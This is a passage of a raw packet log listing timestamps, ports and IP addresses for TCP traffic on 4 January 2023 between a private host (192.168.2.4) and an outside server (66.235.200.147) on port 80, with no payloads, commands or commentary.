Jan 4, 2023 16:47:45.268616915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268629074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268637896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268649101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268659115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268668890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268690109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268711090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269079924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269099951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269119024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269138098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269153118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269156933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269179106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269191980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269205093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269215107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269232035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269246101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269259930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269277096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269287109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269305944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269315958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269328117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269345045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269371986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269391060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269397020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269419909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269427061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269449949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269454002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269473076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269481897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269500017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269510984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269525051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269540071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269553900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269575119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269582987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269592047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269622087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269643068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269649982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.269675016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.269704103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.270077944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.270163059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.270191908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.270217896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.270221949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.270260096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271620989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271666050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271691084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271716118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271735907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271753073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271764040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271768093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271774054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271785021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271806002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271806002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271826982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271831989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271847963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271852970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271867990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271888018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271893978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271904945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271909952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271929979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271929979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271950960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271958113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271970987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.271986961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.271992922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.272020102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.272026062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.272047997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.272049904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.272068024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.272080898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.272113085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.275454044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289283991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289313078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289331913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289350986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289370060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289387941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289405107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289424896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289427996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289443970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289462090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289480925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289499998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289519072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289537907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289556026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289561033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289576054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289593935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289608955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289613008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289633989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289650917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289654970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289669991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289688110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289691925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289707899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289727926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289736032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289748907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289767027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289769888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289788008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289805889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289824009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289830923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289839983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289858103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289875984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289877892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289896011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289915085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289922953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289932013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289941072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289958954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.289959908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.289984941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290003061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290003061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290021896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290024042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290040970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290057898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290067911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290090084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290096045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290122986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290122986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290143013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290162086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290163040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290183067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290201902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290205956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290222883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290225029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290244102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290245056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290268898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290275097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290287971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290303946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290317059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290339947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290359974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290379047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290383101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290400028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290417910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290426970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290448904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290453911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290483952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290483952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290513992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290515900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290532112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290537119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290559053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290577888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290585995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290606976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290616989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290627956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290647030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290652990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290673971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290705919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290709972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290718079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290739059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290755987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290766001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290795088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290827036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290828943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290828943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290849924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290853977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290874958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290878057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290894032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290898085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290915012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290927887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290936947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290956974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290975094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290976048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.290975094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290993929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.290999889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291021109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291028976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291042089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291062117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291069984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291089058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291098118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291100979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291110039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291131020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291136980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291152000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291172028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291177988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291193008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291199923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291214943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291234970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291249990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291255951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291276932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291280031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291296959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291301966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291317940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291337013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291341066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291357040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291368008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291377068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291397095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291404009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291416883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291435957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291440010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291456938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291460991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291477919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291491985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291497946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291516066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291518927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291541100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291549921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291562080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291582108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291582108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291601896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291615009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291621923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291641951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291646957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291661978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291677952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291682005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291702986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291709900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291723013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291742086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291743040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291760921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291766882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291783094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291800022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291802883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291824102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291826010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291843891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291855097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291865110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291884899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291891098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291904926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291920900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291925907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291945934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291954041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.291966915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291985989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.291989088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292006016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292007923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292026043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292037964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292047024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292057037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292067051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292078972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292088032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292107105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292114973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292126894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292143106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292143106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292145967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292160034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292165995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292180061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292186975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292201996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292207956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292224884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292228937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292248964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292257071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292268991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292288065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292288065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292308092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292320013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292327881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292346954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292351007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292366982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292383909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292387009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292407990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292417049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292428017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292448044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292457104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292468071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292473078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292489052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292504072 CET	49696	80	192.168.2.4	66.235.200.147
